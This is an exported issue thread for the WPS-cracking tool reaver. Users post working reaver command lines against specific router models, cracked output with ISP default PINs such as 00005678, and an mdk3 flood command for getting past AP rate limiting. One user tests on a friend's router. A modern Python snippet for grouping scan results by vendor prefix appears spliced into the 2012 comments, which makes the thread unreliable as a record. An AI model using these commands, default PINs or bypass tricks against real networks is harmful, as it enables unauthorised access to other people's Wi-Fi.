detrojones / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

Enhancement Request: Collate AP data for 'optimised' settings #78

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
What steps will reproduce the problem?
1. Allow users the option to send data to you on the first three values 
of the MAC address of attacked APs, with the variables used to attack that AP 
and how successful those attacks have been.


What is the expected output? What do you see instead?

The first 3 variables of the MAC address of an attacked AP show the 
manufacturer and sometimes the model. If successful attacks are collated and 
uploaded for other users to utilise, this would optimise attack strategy.

What version of the product are you using? On what operating system?

Please provide any additional information below.

Original issue reported on code.google.com by pinsb...@gmail.com on 5 Jan 2012 at 1:33

GoogleCodeExporter commented 9 years ago
The program shouldn't call home to send data without asking for user permission 
though.

Original comment by b1957...@nwldx.com on 5 Jan 2012 at 3:39

GoogleCodeExporter commented 9 years ago
That's why the first line said "Allow the users the option...."

Original comment by pinsb...@gmail.com on 5 Jan 2012 at 7:21

GoogleCodeExporter commented 9 years ago
Issue 96 has been merged into this issue.

Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 3:52

GoogleCodeExporter commented 9 years ago
We're looking into having an open source database where users can submit 
settings and download the DB to be used with Reaver.

Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 3:53

GoogleCodeExporter commented 9 years ago
Perfect, thanks guys.

Original comment by pinsb...@gmail.com on 6 Jan 2012 at 4:18

GoogleCodeExporter commented 9 years ago
Backtrack 5v2 64bit
Atheros mini PCI ath9k
reaver v 1.4 r68
AP NetgearWNR 2000v2 E0:91:F5:60:xx:xx
Airodump signal -69, distance approx. 40m through a window

command used:
reaver -i mon0 -b netgearsmacaddr -L -c 1 -a -d 0.2 -S -vv

-L was important because the AP locks for a random time but then continues 
while reaver is running; when reaver has found the first four digits it does not 
lock anymore until the end.

-c was also important because the channel does not switch every time during 
the lock state, but you have to observe the output and check the channel again 
sometimes.

Original comment by patricks...@gmail.com on 6 Jan 2012 at 5:07

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Backtrack 5v2 64bit
Atheros mini PCI ath9k
reaver v 1.4 r73
AP Linksys WRT120N 00:25:9C:E5:xx:xx
AP in same room

command used:
reaver -i mon0 -b linksysmacaddr -c 9 -vv

Walkthrough without problems, sometimes "Receive timeout occurred"

Original comment by patricks...@gmail.com on 6 Jan 2012 at 10:13

GoogleCodeExporter commented 9 years ago
"That's why the first line said "Allow the users the option...." "

:D ... Whoops?

Original comment by b1957...@nwldx.com on 6 Jan 2012 at 10:19

GoogleCodeExporter commented 9 years ago
On the same AP Linksys WRT120N as above

reaver -i mon0 -b linksysmacaddr -d 0.3 -t 1 -vv

Walkthrough with (1 second/attempt) some receive timeouts, but who cares, it 
runs faster.

Original comment by patricks...@gmail.com on 7 Jan 2012 at 12:40

GoogleCodeExporter commented 9 years ago
I ran the same AP Linksys with the same hardware again, doing interrupts and 
restarts in between, and it recovered everything well. Maybe this is the lucky 
combination for success. But it did not work on a Belkin and a ZyXEL AP. The main 
part of the program is working correctly; those errors could come from 
synchronisation problems.

Original comment by patricks...@gmail.com on 8 Jan 2012 at 1:44

GoogleCodeExporter commented 9 years ago

Original comment by cheff...@tacnetsol.com on 10 Jan 2012 at 5:56

GoogleCodeExporter commented 9 years ago
BT 5 r1 64bit
Atheros mini PCI ath9k
AP Broadband Solutions (Swisscom Router)
reaver 1.4 r97
signal -86

reaver -i mon0 -b 00:24:c9:73:xx:xx -a -c 1 -vv

positive attack

pin was an easy one: 00005678
password found correctly

Original comment by patricks...@gmail.com on 16 Jan 2012 at 10:20

GoogleCodeExporter commented 9 years ago
@patrick: Ha! That's an awesome pin - probably not a coincidence. Makes me 
wonder if other units/models from the same vendor have the same or similar pins.

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 10:54

GoogleCodeExporter commented 9 years ago
BT 5 r1 64bit
Atheros mini PCI ath9k
AP Pirelli Broadband Solutions (Swisscom Router)
reaver 1.4 r100
signal -88

reaver -i mon0 -b 64:87:D7:1B:xx:xx -a -c11 -vv

positive attack

pin 01230000
password recovered correctly

@Craig another hit with a simple pin. It's the same manufacturer of AP but must 
be a different model. I have a lot of different WLAN adapters but it works 
only with this one.

Original comment by patricks...@gmail.com on 17 Jan 2012 at 12:19

GoogleCodeExporter commented 9 years ago
BT 5 r1 64bit
Atheros mini PCI ath9k
AP Broadband Solutions (Swisscom Router)
reaver 1.4 r100
signal -89

reaver -i mon0 -b 00:24:C9:8:xx:xx:xx -p 00005678 -c 6 -vv

[+] Pin cracked in 10 seconds
[+] WPS PIN: '00005678'
[+] WPA PSK: 'bo1w-oulv-xxxx-xxxx'
[+] AP SSID: 'PFx-40xxx'
------------------------------------------------------------
Another one
signal -87
AP Motorola (Swisscom)

reaver -i mon0 -b 00:26:42:xx:xx:xx -p 00005678 -c 11 -vv

[+] Pin cracked in 18 seconds
[+] WPS PIN: '00005678'
[+] WPA PSK: 'ykzk-csle-xxxx-xxxx'
[+] AP SSID: 'rix-33xxx'

I just went over to my friend's for support and did a little test at his place 
:-).
It seems that our Swisscom ISP is configuring standards into their APs.
They have strong passwords but ..........
Not everything in Switzerland is secure :-).

Original comment by patricks...@gmail.com on 17 Jan 2012 at 2:19

GoogleCodeExporter commented 9 years ago
Patrick, that is awesome! I've added 00005678 as one of the first pins for 
Reaver to attempt. :)

Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 2:42

GoogleCodeExporter commented 9 years ago
Yes, good job, and I was thinking that double zeros would not be used as the first 
digits,
what a wrong idea....

Original comment by patricks...@gmail.com on 17 Jan 2012 at 2:45

GoogleCodeExporter commented 9 years ago
I thought so too myself, which is why I originally had Reaver randomizing the 
pins. It's hard to account for human error though. :)

Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 2:54

GoogleCodeExporter commented 9 years ago
What do you think of an enhancement of wash? When the output has 
the -b just in front of the BSSID, it is easier to copy and 
paste into the reaver command.
The same would be possible for the channel, -c.

BSSID                Channel  ESSID     RSSI   WPS Version
----------------------------------------------------------
-b xz:xy:xy:xy:xy:xx -c 11 -e testap    -22    1.0

You see the shortcut?

Original comment by patricks...@gmail.com on 17 Jan 2012 at 7:31
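The feature request at the top of this thread (collate results by the first three octets of the BSSID, which identify the manufacturer) and the wash table layout shown just above both come down to the same small piece of parsing. The following is an added example, not code from reaver or wash: it reads rows in the wash column layout quoted above, derives the OUI from each BSSID, and builds a per-vendor inventory of WPS-enabled APs, which is the view an auditor wants when checking their own estate for WPS exposure. The scan rows and the OUI-to-vendor table are constructed placeholders, not real registry data.

```python
"""Group wash-style WPS scan rows by OUI (first three octets of the BSSID).

Added example for this thread, not part of reaver or wash. The sample rows
are constructed to match the column layout quoted in the thread (BSSID,
Channel, ESSID, RSSI, WPS Version); the OUI-to-vendor mapping is a
hypothetical placeholder, not the IEEE registry.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample output in the wash table layout from the thread.
SAMPLE_SCAN = """\
BSSID                Channel  ESSID     RSSI   WPS Version
----------------------------------------------------------
00:11:22:33:44:55    11       testap    -22    1.0
00:11:22:AA:BB:CC    6        lab-ap    -60    1.0
AA:BB:CC:01:02:03    1        guest     -75    2.0
not a valid row
"""

# Hypothetical vendor labels for the constructed OUIs (placeholder data).
OUI_VENDOR = {"00:11:22": "ExampleVendorA", "AA:BB:CC": "ExampleVendorB"}

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")


@dataclass(frozen=True)
class ApRecord:
    bssid: str
    channel: int
    essid: str
    rssi: int
    wps_version: str

    @property
    def oui(self) -> str:
        # First three octets, upper-cased, e.g. "00:11:22".
        return self.bssid[:8].upper()


def parse_wash_output(text: str) -> list[ApRecord]:
    """Parse table rows; skip the header, the separator and malformed lines."""
    records: list[ApRecord] = []
    for line in text.splitlines():
        parts = line.split()
        # A data row has exactly five whitespace-separated columns and a MAC first.
        if len(parts) != 5 or not MAC_RE.match(parts[0]):
            continue
        try:
            records.append(
                ApRecord(parts[0].upper(), int(parts[1]), parts[2], int(parts[3]), parts[4])
            )
        except ValueError:
            continue  # non-numeric channel or RSSI: treat as a malformed row
    return records


def group_by_oui(records: list[ApRecord]) -> dict[str, list[ApRecord]]:
    grouped: dict[str, list[ApRecord]] = defaultdict(list)
    for rec in records:
        grouped[rec.oui].append(rec)
    return dict(grouped)


def summarize(records: list[ApRecord]) -> dict[str, dict]:
    """Per-OUI inventory: vendor label, number of WPS-enabled APs, channels and WPS versions seen."""
    summary: dict[str, dict] = {}
    for oui, aps in group_by_oui(records).items():
        summary[oui] = {
            "vendor": OUI_VENDOR.get(oui, "unknown"),
            "count": len(aps),
            "channels": sorted({a.channel for a in aps}),
            "wps_versions": sorted({a.wps_version for a in aps}),
        }
    return summary


if __name__ == "__main__":
    for oui, info in summarize(parse_wash_output(SAMPLE_SCAN)).items():
        print(oui, info)
```

Rows that do not have exactly five columns or do not start with a well-formed MAC are dropped rather than guessed at, so the header, the dashed separator and stray text never pollute the inventory; replace `OUI_VENDOR` with a real OUI registry lookup when using this against actual scan output.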

GoogleCodeExporter commented 9 years ago
In my area Insight (cable provider) uses Belkin routers. They have been 
crackable but always in the last 10%, on all 4 so far lol. Just my input.

Original comment by entept...@gmail.com on 30 Jan 2012 at 1:05

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Hey guys! I have a problem: when I connect to a router, after a few minutes it 
reports "detected AP rate limiting, waiting 60 seconds before re-checking", so I 
left it for a couple of hours but nothing happened. I tried all the commands that you 
wrote here but none helps .. always the same thing happens .. WPA2-PSK - 
decryption.
The router is a Siemens SX763. I live in Croatia ..
Please help, you masters who have a little better understanding of Linux and BackTrack ..
PS. Latest BackTrack 5 R2 x32 ...
Thanks in advance!

Original comment by bahrijaz...@gmail.com on 8 Mar 2012 at 11:47

GoogleCodeExporter commented 9 years ago
Run "mdk3 mon0 a -a XX:XX:XX:XX:XX:XX" for 2-3 minutes; it will fool the Siemens 
and you continue with reaver until it is necessary to repeat the mdk3 command.

Original comment by pozega.t...@gmail.com on 16 May 2012 at 7:17

GoogleCodeExporter commented 9 years ago
cheff, how is the open source database going? Almost what, 4 months have passed since 
that.

Original comment by bersebu...@gmail.com on 20 May 2012 at 4:34

GoogleCodeExporter commented 9 years ago
Any database yet? I would like to know about the Thomson used in Portugal by the ISP MEO.

Original comment by Tiago.Ge...@gmail.com on 26 Oct 2012 at 12:57